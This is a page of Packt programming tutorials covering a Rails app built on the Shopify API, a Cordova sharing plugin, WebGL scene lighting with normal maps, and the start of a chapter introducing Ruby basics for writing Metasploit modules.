Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7011 Articles
article-image-building-private-app
Packt
23 May 2014
14 min read
Save for later

Building a Private App

Packt
23 May 2014
14 min read
(For more resources related to this topic, see here.) Even though the app will be simple and only take a few hours to build, we'll still use good development practices to ensure we create a solid foundation. There are many different approaches to software development and discussing even a fraction of them is beyond the scope of this book. Instead, we'll use a few common concepts, such as requirements gathering, milestones, Test-Driven Development (TDD), frequent code check-ins, and appropriate commenting/documentation. Personal discipline in following development procedures is one of the best things a developer can bring to a project; it is even more important than writing code. This article will cover the following topics: The structure of the app we'll be building The development process Working with the Shopify API Using source control Deploying to production Signing up for Shopify Before we dive back into code, it would be helpful to get the task of setting up a Shopify store out of the way. Sign up as a Shopify partner by going to http://partners.shopify.com. The benefit of this is that partners can provision stores that can be used for testing. Go ahead and make one now before reading further. Keep your login information close at hand; we'll need it in just a moment. Understanding our workflow The general workflow for developing our application is as follows: Pull down the latest version of the master branch. Pick a feature to implement from our requirements list. Create a topic branch to keep our changes isolated. Write tests that describe the behavior desired by our feature. Develop the code until it passes all the tests. Commit and push the code into the remote repository. Pull down the latest version of the master branch and merge it with our topic branch. Run the test suite to ensure that everything still works. Merge the code back with the master branch. Commit and push the code to the remote repository. The previous list should give you a rough idea of what is involved in a typical software project involving multiple developers. The use of topic branches ensures that our work in progress won't affect other developers (called breaking the build) until we've confirmed that our code has passed all the tests and resolved any conflicts by merging in the latest stable code from the master branch. The practical upside of this methodology is that it allows bug fixes or work from another developer to be added to the project at any time without us having to worry about incomplete code polluting the build. This also gives us the ability to deploy production from a stable code base. In practice, a lot of projects will also have a production branch (or tagged release) that contains a copy of the code currently running in production. This is primarily in case of a server failure so that the application can be restored without having to worry about new features being released ahead of schedule, and secondly so that if a new deploy introduces bugs, it can easily be rolled back. Building the application We'll be building an application that allows Shopify storeowners to organize contests for their shoppers and randomly select a winner. Contests can be configured based on purchase history and timeframe. For example, a contest could be organized for all the customers who bought the newest widget within the last three days, or anyone who has made an order for any product in the month of August. To accomplish this, we'll need to be able to pull down order information from the Shopify store, generate a random winner, and show the storeowner the results. Let's start out by creating a list of requirements for our application. We'll use this list to break our development into discrete pieces so we can easily measure our progress and also keep our focus on the important features. Of course, it's difficult to make a complete list of all the requirements and have it stick throughout the development process, which is why a common strategy is to develop in iterations (or sprints). The result of an iteration is a working app that can be reviewed by the client so that the remaining features can be reprioritized if necessary. High-level requirements The requirements list comprises all the tasks we're going to accomplish in this article. The end result will be an application that we can use to run a contest for a single Shopify store. Included in the following list are any related database, business logic, and user interface coding necessary. Install a few necessary gems. Store Shopify API credentials. Connect to Shopify. Retrieve order information from Shopify. Retrieve product information from Shopify. Clean up the UI. Pick a winner from a list. Create contests. Now that we have a list of requirements, we can treat each one as a sprint. We will work in a topic branch and merge our code to the master branch at the end of the sprint. Installing a few necessary gems The first item on our list is to add a few code libraries (gems) to our application. Let's create a topic branch and do just that. To avoid confusion over which branch contains code for which feature, we can start the branch name with the requirement number. We'll additionally prepend the chapter number for clarity, so our format will be <chapter #>_<requirement #>_<branch name>. Execute the following command line in the root folder of the app: git checkout -b ch03_01_gem_updates This command will create a local branch called ch03_01_gem_updates that we will use to isolate our code for this feature. Once we've installed all the gems and verified that the application runs correctly, we'll merge our code back with the master branch. At a minimum we need to install the gems we want to use for testing. For this app we'll use RSpec. We'll need to use the development and test group to make sure the testing gems aren't loaded in production. Add the following code in bold to the block present in the Gemfile: group :development, :test do gem "sqlite3" # Helpful gems gem "better_errors" # improves error handling gem "binding_of_caller" # used by better errors # Testing frameworks gem 'rspec-rails' # testing framework gem "factory_girl_rails" # use factories, not fixtures gem "capybara" # simulate browser activity gem "fakeweb" # Automated testing gem 'guard' # automated execution of test suite upon change gem "guard-rspec" # guard integration with rspec # Only install the rb-fsevent gem if on Max OSX gem 'rb-fsevent' # used for Growl notifications end Now we need to head over to the terminal and install the gems via Bundler with the following command: bundle install The next step is to install RSpec: rails generate rspec:install The final step is to initialize Guard: guard init rspec This will create a Guard file, and fill it with the default code needed to detect the file changes. We can now restart our Rails server and verify that everything works properly. We have to do a full restart to ensure that any initialization files are properly picked up. Once we've ensured that our page loads without issue, we can commit our code and merge it back with the master branch: git add --all git commit -am "Added gems for testing" git checkout master git merge ch03_01_gem_updates git push Great! We've completed our first requirement. Storing Shopify API credentials In order to access our test store's API, we'll need to create a Private App and store the provided credentials there for future use. Fortunately, Shopify makes this easy for us via the Admin UI: Go to the Apps page. At the bottom of the page, click on the Create a private API key… link. Click on the Generate new Private App button. We'll now be provided with three important pieces of information: the API Key, password, and shared secret. In addition, we can see from the example URL field that we need to track our Shopify URL as well. Now that we have credentials to programmatically access our Shopify store, we can save this in our application. Let's create a topic branch and get to work: git checkout -b ch03_02_shopify_credentials Rails offers a generator called a scaffold that will create the database migration model, controller, view files, and test stubs for us. Run the following from the command line to create the scaffold for the Account vertical (make sure it is all on one line): rails g scaffold Account shopify_account_url:string shopify_api_key:string shopify_password:string shopify_shared_secret:string We'll need to run the database migration to create the database table using the following commands: bundle exec rake db:migrate bundle exec rake db:migrate RAILS_ENV=test Use the following command to update the generated view files to make them bootstrap compatible: rails g bootstrap:themed Accounts -f Head over to http://localhost:3000/accounts and create a new account in our app that uses the Shopify information from the Private App page. It's worth getting Guard to run our test suite every time we make a change so we can ensure that we don't break anything. Open up a new terminal in the root folder of the app and start up Guard: bundle exec guard After booting up, Guard will automatically run all our tests. They should all pass because we haven't made any changes to the generated code. If they don't, you'll need to spend time sorting out any failures before continuing. The next step is to make the app more user friendly. We'll make a few changes now and leave the rest for you to do later. Update the layout file so it has accurate navigation. Boostrap created several dummy links in the header navigation and sidebar. Update the navigation list in /app/views/layouts/application.html.erb to include the following code: <a class="brand" href="/">Contestapp</a> <div class="container-fluid nav-collapse"> <ul class="nav"> <li><%= link_to "Accounts", accounts_path%></li> </ul> </div><!--/.nav-collapse --> Add validations to the account model to ensure that all fields are required when creating/updating an account. Add the following lines to /app/models/account.rb: validates_presence_of :shopify_account_url validates_presence_of :shopify_api_key validates_presence_of :shopify_password validates_presence_of :shopify_shared_secret This will immediately cause the controller tests to fail due to the fact that it is not passing in all the required fields when attempting to submit the created form. If you look at the top of the file, you'll see some code that creates the :valid_attributes hash. If you read the comment above it, you'll see that we need to update the hash to contain the following minimally required fields: # This should return the minimal set of attributes required # to create a valid Account. As you add validations to # Account, be sure to adjust the attributes here as well. let(:valid_attributes) { { "shopify_account_url" => "MyString", "shopify_password" => "MyString", "shopify_api_ key" => "MyString", "shopify_shared_secret" => "MyString" } } This is a prime example of why having a testing suite is important. It keeps us from writing code that breaks other parts of the application, or in this case, helps us discover a weakness we might not have known we had: the ability to create a new account record without filling in any fields! Now that we have satisfied this requirement and all our tests pass, we can commit the code and merge it with the master branch: git add --all git commit -am "Account model and related files" git checkout master git merge ch03_02_shopify_credentials git push Excellent! We've now completed another critical piece! Connecting to Shopify Now that we have a test store to work with, we're ready to implement the code necessary to connect our app to Shopify. First, we need to create a topic branch: git checkout -b ch03_03_shopify_connection We are going to use the official Shopify gem to connect our app to our test store, as well as interact with the API. Add this to the Gemfile under the gem 'bootstrap-sass' line: gem 'shopify_api' Update the bundle from the command line: bundle install We'll also need to restart Guard in order for it to pick up the new gem. This is typically done by using a key combination like Ctrl + Z< (Windows) or Cmd + C (Mac OS X) or by typing the word exit and pressing the Enter key. I've written a class that encapsulates the Shopify connection logic and initializes the global ShopifyAPI class that we can then use to interact with the API. You can find the code for this class in ch03_shopify_integration.rb. You'll need to copy the contents of this file to your app in a new file located at /app/services/shopify_integration.rb. The contents of the spec file ch03_shopify_integration_spec.rb need to be pasted in a new file located at /spec/services/shopify_integration_spec.rb. Using this class will allow us to execute something like ShopifyAPI::Order.find(:all) to get a list of orders, or ShopifyAPI::Product.find(1234) to retrieve the product with the ID 1234. The spec file contains tests for functionality that we haven't built yet and will initially fail. We'll fix this soon! We are going to add a Test Connection button to the account page that will give the user instant feedback as to whether or not the credentials are valid. Because we will be adding a new action to our application, we will need to first update controller, request, routing, and view tests before proceeding. Given the nature of this article and because in this case, we're connecting to an external service, the topics such as mocking, test writing, and so on will have to be reviewed as homework. I recommend watching the excellent screencasts created by Ryan Bates at http://railscasts.com as a primer on testing in Rails. The first step is to update the resources :accounts route in the /config/routes.rb file with the following block: resources :accounts do member do get 'test_connection' end end Copy the controller code from ch03_accounts_controller.rb and replace the code in /app/controllers/accounts_controller.rb file. This new code adds the test_connection method as well as ensuring the account is loaded properly. Finally, we need to add a button to /app/views/account/show.html.erb that will call this action in div.form-actions: <%= link_to "Test Connection",test_connection_account_path(@account), :class => 'btn' %> If we view the account page in our browser, we can now test our Shopify integration. Assuming that everything was copied correctly, we should see a success message after clicking on the Test Connection button. If everything was not copied correctly, we'll see the message that the Shopify API returned to us as a clue to what isn't working. Once all the tests pass, we can commit the code and merge it with the master branch: git add --all git commit -am "Shopify connection and related UI" git checkout master git merge ch03_03_shopify_connection git push Having fun? Good, because things are about to get heavy. Summary: As you can see and understand this article explains briefly about, the integration with Shopify's API in order to retrieve product and order information from the shop. The UI is then streamlined a bit before the logic to create a contest is created. Resources for Article: Further resources on this subject: Integrating typeahead.js into WordPress and Ruby on Rails [Article] Xen Virtualization: Work with MySQL Server, Ruby on Rails, and Subversion [Article] Designing and Creating Database Tables in Ruby on Rails [Article]
Read more
  • 0
  • 0
  • 11262

article-image-working-sharing-plugin
Packt
23 May 2014
11 min read
Save for later

Working with the sharing plugin

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.) Now that we've dealt with the device events, let's get to the real meat of the project: let's add the sharing plugin and see how to use it. Getting ready Before continuing, be sure to add the plugin to your project: cordova plugin add https ://github.com/leecrossley/cordova-plugin-social-message.git Getting on with it This particular plugin is one of many socialnetwork plugins. Each one has its benefits and each one has its problems, and the available plugins are changing rapidly. This particular plugin is very easy to use, and supports a reasonable amount of social networks. On iOS, Facebook, Twitter, Mail, and Flickr are supported. On Android, any installed app that registers with the intent to share is supported. The full documentation is available at https://github.com/leecrossley/cordova-plugin-social-message at the time of writing this. It is easy to follow if you need to know more than what we cover here. To show a sharing sheet (the appearance varies based on platform and operation system), all we have to do is this: window.socialshare.send ( message ); message is an object that contains any of the following properties: text: This is the main content of the message. subject: This is the subject of the message. This is only applicable while sending e-mails; most other social networks will ignore this value. url: This is a link to attach to the message. image: This is an absolute path to the image in order to attach it to the message. It must begin with file:/// and the path should be properly escaped (that is, spaces should become %20, and so on). activityTypes (only for iOS): This supports activities on various social networks. Valid values are: PostToFacebook, PostToTwitter, PostToWeibo, Message, Mail, Print, CopyToPasteboard, AssignToContact, and SaveToCameraRoll. In order to create a simple message to share, we can use the following code: var message = {     text: "something to send" } window.socialshare.send ( message ); To add an image, we can go a step further, shown as follows: var message = {     text: "the caption",     image: "file://var/mobile/…/image.png" } window.socialshare.send ( message ); Once this method is called, the sharing sheet will appear. On iOS 7, you'll see something like the following screenshot: On Android, you will see something like the following screenshot: What did we do? In this section, we installed the sharing plugin and we learned how to use it. In the next sections, we'll cover the modifications required to use this plugin. Modifying the text note edit view We've dispatched most of the typical sections in this project—there's not really any user interface to design, nor are there any changes to the actual note models. All we need to do is modify the HTML template a little to include a share button and add the code to use the plugin. Getting on with it First, let's alter the template in www/html/textNoteEditView.html. I've highlighted the changes: <html>   <body>     <div class="ui-navigation-bar">       <div class="ui-title"         contenteditable="true">%NOTE_NAME%</div>       <div class="ui-bar-button-group ui-align-left">         <div class="ui-bar-button ui-tint-color ui-back-button">%BACK%</div>       </div>       <div class="ui-bar-button-group ui-align-right">         <div class="ui-bar-button ui-destructive-           color">%DELETE_NOTE%</div>       </div>     </div>     <div class="ui-scroll-container ui-avoid-navigation-bar ui-       avoid-tool-bar">       <textarea class="ui-text-box" >%NOTE_CONTENTS%</textarea>     </div><div class="ui-tool-bar"><div class="ui-bar-button-group ui-align-left"></div><div class="ui-bar-button-group ui-align-center">     </div>         <div class="ui-bar-button-group ui-align-right">        <div class="ui-bar-button ui-background-tint-color ui- glyph ui-glyph-share share-button"></div></div>    </div></body></html> Now, let's make the modifications to the view in www/js/app/views/textNoteEditView.js. First, we need to add an internal property that references the share button: self._shareButton = null; Next, we need to add code to renderToElement so that we can add an event handler to the share button. We'll do a little bit of checking here to see if we've found the icon, because we don't support sharing of videos and sounds and we don't include that asset in those views. If we didn't have the null check, those views would fail to work. Consider the following code snippet: self.renderToElement = function () {   …   self._shareButton = self.element.querySelector ( ".share-button"     );   if (self._shareButton !== null) {     Hammer ( self._shareButton ).on("tap", self.shareNote);   }   … } Finally, we need to add the method that actually shares the note. Note that we save the note before we share it, since that's how the data in the DOM gets transmitted to the note model. Consider the following code snippet: self.shareNote = function () {   self.saveNote();   var message = {     subject: self._note.name,     text: self._note.textContents   };   window.socialmessage.send ( message ); } What did we do? First, we added a toolbar to the view that looks like the following screenshot—note the new sharing icon: Then, we added the code that shares the note and attaches that code to the Share button. Here's an example of us sending a tweet from a note on iOS: What else do I need to know? Don't forget that social networks often have size limits. For example, Twitter only supports 140 characters, and so if you send a note using Twitter, it needs to be a very short note. We could, on iOS, prevent Twitter from being permitted, but there's no way to prevent this on Android. Even then, there's no real reason not to prevent Twitter from being an option. The user just needs to be familiar enough with the social network to know that they'll have to edit the content before posting it. Also, don't forget that the subject of a message only applies to mail; most other social networks will ignore it. If something is critical, be sure to include it in the text of the message, and not the subject only. Modifying the image note edit view The image note edit view presents an additional difficulty: we can't put the Share button in a toolbar. This is because doing so will cause positioning difficulties with TEXTAREA and the toolbar when the soft keyboard is visible. Instead, we'll put it in the lower-right corner of the image. This is done by using the same technique we used to outline the camera button. Getting on with it Let's edit the template in www/html/imageNoteEditView.html; again, I've highlighted the changes: <html>   <body>     <div class="ui-navigation-bar">       <div class="ui-title"         contenteditable="true">%NOTE_NAME%</div>       <div class="ui-bar-button-group ui-align-left">         <div class="ui-bar-button ui-tint-color ui-back-           button">%BACK%</div>       </div>       <div class="ui-bar-button-group ui-align-right">         <div class="ui-bar-button ui-destructive-           color">%DELETE_NOTE%</div>       </div>     </div>     <div class="ui-scroll-container ui-avoid-navigation-bar">       <div class="image-container">         <div class="ui-glyph ui-background-tint-color ui-glyphcamera-         outline"></div>               <div class="ui-glyph ui-background-tint-color ui-glyph-           camera outline"></div>         <div class="ui-glyph ui-background-tint-color ui-glyph-           camera non-outline"></div>         <div class="ui-glyph ui-background-tint-color ui-glyph-           share outline"></div>         <div class="ui-glyph ui-background-tint-color ui-glyph-           share non-outline share-button"></div>       </div>       <textarea class="ui-text-box"         onblur="this.classList.remove('editing');"         onfocus="this.classList.add('editing');         ">%NOTE_CONTENTS%</textarea>     </div>   </body> </html> Because sharing an image requires a little additional code, we need to override shareNote (which we inherit from the prior task) in www/js/app/views/imageNoteEditView.js: self.shareNote = function () {   var fm = noteStorageSingleton.fileManager;   var nativePath = fm.getNativeURL ( self._note.mediaContents );   self.saveNote();   var message = {     subject: self._note.name,     text: self._note.textContents   };   if (self._note.unitValue > 0) {     message.image = nativePath;   }   window.socialmessage.send ( message ); } Finally, we need to add the following styles to www/css/style.css: div.ui-glyph.ui-background-tint-color.ui-glyph-share.outline, div.ui-glyph.ui-background-tint-color.ui-glyph-share.non-outline {   left:inherit;   width:50px;   top: inherit;   height:50px; } {   -webkit-mask-position:15px 16px;   mask-position:15px 16px; } div.ui-glyph.ui-background-tint-color.ui-glyph-share.non-outline {   -webkit-mask-position:15px 15px;   mask-position:15px 15px; } What did we do? Like the previous task, we first modified the template to add the share icon. Then, we added the shareNote code to the view (note that we don't have to add anything to find the button, because we inherit it from the Text Note Edit View). Finally, we modify the style sheet to reposition the Share button appropriately so that it looks like the following screenshot: What else do I need to know? The image needs to be a valid image, or the plugin may crash. This is why we check for the value of unitValue in shareNote to ensure that it is large enough to attach to the message. If not, we only share the text. Game Over... Wrapping it up And that's it! You've learned how to respond to device events, and you've also added sharing to text and image notes by using a third-party plugin. Can you take the HEAT? The Hotshot Challenge There are several ways to improve the project. Why don't you try a few? Implement the ability to save the note when the app receives a pause event, and then restore the note when the app is resumed. Remember which note is visible when the app is paused, and restore it when the app is resumed. (Hint: localStorage may come in handy.) Add video or audio sharing. You'll probably have to alter the sharing plugin or find another (or an additional) plugin. You'll probably also need to upload the data to an external server so that it can be linked via the social network. For example, it's often customary to link to a video on Twitter by using a link shortener. The File Transfer plugin might come in handy for this challenge (https://github.com/apache/cordova-plugin-file-transfer/blob/dev/doc/index.md). Summary This article introduced you to a third-party plugin that provides access to e-mail and various social networks. Resources for Article: Further resources on this subject: Geolocation – using PhoneGap features to improve an app's functionality, write once use everywhere [Article] Configuring the ChildBrowser plugin [Article] Using Location Data with PhoneGap [Article]
Read more
  • 0
  • 0
  • 3837

article-image-3d-websites
Packt
23 May 2014
10 min read
Save for later

3D Websites

Packt
23 May 2014
10 min read
(For more resources related to this topic, see here.) Creating engaging scenes There is no adopted style for a 3D website. No metaphor can best describe the process of designing the 3D web. Perhaps what we know the most is what does not work. Often, our initial concept is to model the real world. An early design that was used years ago involved a university that wanted to use its campus map to navigate through its website. One found oneself dragging the mouse repeatedly, as fast as one could, just to get to the other side of campus. A better design would've been a book shelf where everything was in front of you. To view the chemistry department, just grab the chemistry book, and click on the virtual pages to view the faculty, curriculum, and other department information. Also, if you needed to cross-reference this with the math department's upcoming schedule, you could just grab the math book. Each attempt adds to our knowledge and gets us closer to something better. What we know is what most other applications of computer graphics learned—that reality might be a starting point, but we should not let it interfere with creativity. 3D for the sake of recreating the real world limits our innovative potential. Following this starting point, strip out the parts bound by physics, such as support beams or poles that serve no purpose in a virtual world. Such items make the rendering slower by just existing. Once we break these bounds, the creative process takes over—perhaps a whimsical version, a parody, something dark and scary, or a world-emphasizing story. Characters in video games and animated movies take on stylized features. The characters are purposely unrealistic or exaggerated. One of the best animations to exhibit this is Chris Landreth's The Spine, Ryan (Academy Award for best-animated short film in 2004), and his earlier work in Psychological Driven Animation, where the characters break apart by the ravages of personal failure (https://www.nfb.ca/film/ryan). This demonstration will describe some of the more difficult technical issues involved with lighting, normal maps, and the efficient sharing of 3D models. The following scene uses 3D models and textures maps from previous demonstrations but with techniques that are more complex. Engage thrusters This scene has two lampposts and three brick walls, yet we only read in the texture map and 3D mesh for one of each and then reuse the same models several times. This has the obvious advantage that we do not need to read in the same 3D models several times, thus saving download time and using less memory. A new function, copyObject(), was created that currently sits inside the main WebGL file, although it can be moved to mesh3dObject.js. In webGLStart(), after the original objects were created, we call copyObject(), passing along the original object with the unique name, location, rotation, and scale. In the following code, we copy the original streetLight0Object into a new streetLight1Object: streetLight1Object = copyObject( streetLight0Object, "streetLight1", streetLight1Location, [1, 1, 1], [0, 0, 0] ); Inside copyObject(), we first create the new mesh and then set the unique name, location (translation), rotation, and scale: function copyObject(original, name, translation, scale, rotation) { meshObjectArray[ totalMeshObjects ] = new meshObject(); newObject = meshObjectArray[ totalMeshObjects ]; newObject.name = name; newObject.translation = translation; newObject.scale = scale; newObject.rotation = rotation; The object to be copied is named original. We will not need to set up new buffers since the new 3D mesh can point to the same buffers as the original object: newObject.vertexBuffer = original.vertexBuffer; newObject.indexedFaceSetBuffer = original.indexedFaceSetBuffer; newObject.normalsBuffer = original.normalsBuffer; newObject.textureCoordBuffer = original.textureCoordBuffer; newObject.boundingBoxBuffer = original.boundingBoxBuffer; newObject.boundingBoxIndexBuffer = original.boundingBoxIndexBuffer; newObject.vertices = original.vertices; newObject.textureMap = original.textureMap; We do need to create a new bounding box matrix since it is based on the new object's unique location, rotation, and scale. In addition, meshLoaded is set to false. At this stage, we cannot determine if the original mesh and texture map have been loaded since that is done in the background: newObject.boundingBoxMatrix = mat4.create(); newObject.meshLoaded = false; totalMeshObjects++; return newObject; } There is just one more inclusion to inform us that the original 3D mesh and texture map(s) have been loaded inside drawScene(): streetLightCover1Object.meshLoaded = streetLightCover0Object.meshLoaded; streetLightCover1Object.textureMap = streetLightCover0Object.textureMap; This is set each time a frame is drawn, and thus, is redundant once the mesh and texture map have been loaded, but the additional code is a very small hit in performance. Similar steps are performed for the original brick wall and its two copies. Most of the scene is programmed using fragment shaders. There are four lights: the two streetlights, the neon Products sign, and the moon, which sets and rises. The brick wall uses normal maps. However, it is more complex here; the use of spotlights and light attenuation, where the light fades over a distance. The faint moon light, however, does not fade over a distance. Opening scene with four light sources: two streetlights, the Products neon sign, and the moon This program has only three shaders: LightsTextureMap, used by the brick wall with a texture normal map; Lights, used for any object that is illuminated by one or more lights; and Illuminated, used by the light sources such as the moon, neon sign, and streetlight covers. The simplest out of these fragment shaders is Illuminated. It consists of a texture map and the illuminated color, uLightColor. For many objects, the texture map would simply be a white placeholder. However, the moon uses a texture map, available for free from NASA that must be merged with its color: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s, vTextureCoord.t)); gl_FragColor = vec4(fragmentColor.rgb * uLightColor, 1.0); The light color also serves another purpose, as it will be passed on to the other two fragment shaders since each adds its own individual color: off-white for the streetlights, gray for the moon, and pink for the neon sign. The next step is to use the shaderLights fragment shader. We begin by setting the ambient light, which is a dim light added to every pixel, usually about 0.1, so nothing is pitch black. Then, we make a call for each of our four light sources (two streetlights, the moon, and the neon sign) to the calculateLightContribution() function: void main(void) { vec3 lightWeighting = vec3(uAmbientLight, uAmbientLight, uAmbientLight); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight0Loc, uSpotLightDir, false); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight1Loc, uSpotLightDir, false); lightWeighting += uMoonLightColor * calculateLightContribution(uMoonLightPos, vec3(0.0, 0.0, 0.0), true); lightWeighting += uProductTextColor * calculateLightContribution(uProductTextLoc, vec3(0.0, 0.0, 0.0), true); All four calls to calculateLightContribution() are multiplied by the light's color (white for the streetlights, gray for the moon, and pink for the neon sign). The parameters in the call to calculateLightContribution(vec3, vec3, vec3, bool) are: location of the light, its direction, the pixel's normal, and the point light. This parameter is true for a point light that illuminates in all directions, or false if it is a spotlight that points in a specific direction. Since point lights such as the moon or neon sign have no direction, their direction parameter is not used. Therefore, their direction parameter is set to a default, vec3(0.0, 0.0, 0.0). The vec3 lightWeighting value accumulates the red, green, and blue light colors at each pixel. However, these values cannot exceed the maximum of 1.0 for red, green, and blue. Colors greater than 1.0 are unpredictable based on the graphics card. So, the red, green, and blue light colors must be capped at 1.0: if ( lightWeighting.r > 1.0 ) lightWeighting.r = 1.0; if ( lightWeighting.g > 1.0 ) lightWeighting.g = 1.0; if ( lightWeighting.b > 1.0 ) lightWeighting.b = 1.0; Finally, we calculate the pixels based on the texture map. Only the street and streetlight posts use this shader, and neither have any tiling, but the multiplication by uTextureMapTiling was included in case there was tiling. The fragmentColor based on the texture map is multiplied by lightWeighting—the accumulation of our four light sources for the final color of each pixel: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)); gl_FragColor = vec4(fragmentColor.rgb * lightWeighting.rgb, 1.0); } In the calculateLightContribution() function, we begin by determining the angle between the light's direction and point's normal. The dot product is the cosine between the light's direction to the pixel and the pixel's normal, which is also known as Lambert's cosine law (http://en.wikipedia.org/wiki/Lambertian_reflectance): vec3 distanceLightToPixel = vec3(vPosition.xyz - lightLoc); vec3 vectorLightPosToPixel = normalize(distanceLightToPixel); vec3 lightDirNormalized = normalize(lightDir); float angleBetweenLightNormal = dot( -vectorLightPosToPixel, vTransformedNormal ); A point light shines in all directions, but a spotlight has a direction and an expanding cone of light surrounding this direction. For a pixel to be lit by a spotlight, that pixel must be in this cone of light. This is the beam width area where the pixel receives the full amount of light, which fades out towards the cut-off angle that is the angle where there is no more light coming from this spotlight: With texture maps removed, we reveal the value of the dot product between the pixel normal and direction of the light if ( pointLight) { lightAmt = 1.0; } else { // spotlight float angleLightToPixel = dot( vectorLightPosToPixel, lightDirNormalized ); // note, uStreetLightBeamWidth and uStreetLightCutOffAngle // are the cosines of the angles, not actual angles if ( angleLightToPixel >= uStreetLightBeamWidth ) { lightAmt = 1.0; } if ( angleLightToPixel > uStreetLightCutOffAngle ) { lightAmt = (angleLightToPixel - uStreetLightCutOffAngle) / (uStreetLightBeamWidth - uStreetLightCutOffAngle); } } After determining the amount of light at that pixel, we calculate attenuation, which is the fall-off of light over a distance. Without attenuation, the light is constant. The moon has no light attenuation since it's dim already, but the other three lights fade out at the maximum distance. The float maxDist = 15.0; code snippet says that after 15 units, there is no more contribution from this light. If we are less than 15 units away from the light, reduce the amount of light proportionately. For example, a pixel 10 units away from the light source receives (15-10)/15 or 1/3 the amount of light: attenuation = 1.0; if ( uUseAttenuation ) { if ( length(distanceLightToPixel) < maxDist ) { attenuation = (maxDist - length(distanceLightToPixel))/maxDist; } else attenuation = 0.0; } Finally, we multiply the values that make the light contribution and we are done: lightAmt *= angleBetweenLightNormal * attenuation; return lightAmt; Next, we must account for the brick wall's normal map using the shaderLightsNormalMap-fs fragment shader. The normal is equal to rgb * 2 – 1. For example, rgb (1.0, 0.5, 0.0), which is orange, would become a normal (1.0, 0.0, -1.0). This normal is converted to a unit value or normalized to (0.707, 0, -0.707): vec4 textureMapNormal = vec4( (texture2D(uSamplerNormalMap, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)) * 2.0) - 1.0 ); vec3 pixelNormal = normalize(uNMatrix * normalize(textureMapNormal.rgb) ); A normal mapped brick (without red brick texture image) reveals how changing the pixel normal altersthe shading with various light sources We call the same calculateLightContribution() function, but we now pass along pixelNormal calculated using the normal texture map: calculateLightContribution(uSpotLight0Loc, uSpotLightDir, pixelNormal, false); From here, much of the code is the same, except we use pixelNormal in the dot product to determine the angle between the normal and the light sources: float angleLightToTextureMap = dot( -vectorLightPosToPixel, pixelNormal ); Now, angleLightToTextureMap replaces angleBetweenLightNormal because we are no longer using the vertex normal embedded in the 3D mesh's .obj file, but instead we use the pixel normal derived from the normal texture map file, brickNormalMap.png. A normal mapped brick wall with various light sources Objective complete – mini debriefing This comprehensive demonstration combined multiple spot and point lights, shared 3D meshes instead of loading the same 3D meshes, and deployed normal texture maps for a real 3D brick wall appearance. The next step is to build upon this demonstration, inserting links to web pages found on a typical website. In this example, we just identified a location for Products using a neon sign to catch the users' attention. As a 3D website is built, we will need better ways to navigate this virtual space and this is covered in the following section.
Read more
  • 0
  • 0
  • 12252

article-image-ruby-and-metasploit-modules
Packt
23 May 2014
11 min read
Save for later

Ruby and Metasploit Modules

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.) Reinventing Metasploit Consider a scenario where the systems under the scope of the penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually will consume a lot of time and will be tiring as well. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download a file from all the systems that are compromised. This article focuses on building programming skill sets for Metasploit modules. This article kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points: Understanding the basics of Ruby programming Writing programs in Ruby programming Exploring modules in Metasploit Writing your own modules and post-exploitation modules Let's now understand the basics of Ruby programming and gather the required essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required in order to design these modules. However, why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question: Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit Ruby is an object-oriented style of programming Ruby is an interpreter-based language that is fast and consumes less development time Earlier, Perl used to not support code reuse Ruby – the heart of Metasploit Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language. Yokihiru Matsumoto designed it in 1995. It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl. You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0. Creating your first Ruby program Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. However, remember that Ruby is a vast programming language. Covering all the capabilities of Ruby will push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules. Interacting with the Ruby shell Ruby offers an interactive shell too. Working on the interactive shell will help us understand the basics of Ruby clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2 as follows: irb(main):001:0> 2 => 2 The shell throws back the value. Now, let's give another input such as the addition operation as follows: irb(main):002:0> 2+3 => 5 We can see that if we input numbers using an expression style, the shell gives us back the result of the expression. Let's perform some functions on the string, such as storing the value of a string in a variable, as follows: irb(main):005:0> a= "nipun" => "nipun" irb(main):006:0> b= "loves metasploit" => "loves metasploit" After assigning values to the variables a and b, let's see what the shell response will be when we write a and a+b on the shell's console: irb(main):014:0> a => "nipun" irb(main):015:0> a+b => "nipunloves metasploit" We can see that when we typed in a as an input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b. Defining methods in the shell A method or function is a set of statements that will execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them using the script as well. Methods are an important aspect when working with Metasploit modules. Let's see the syntax: def method_name [( [arg [= default]]...[, * arg [, &expr ]])] expr end To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to set an end to the method definition. Here, arg refers to the arguments that a method receives. In addition, expr refers to the expressions that a method receives or calculates inline. Let's 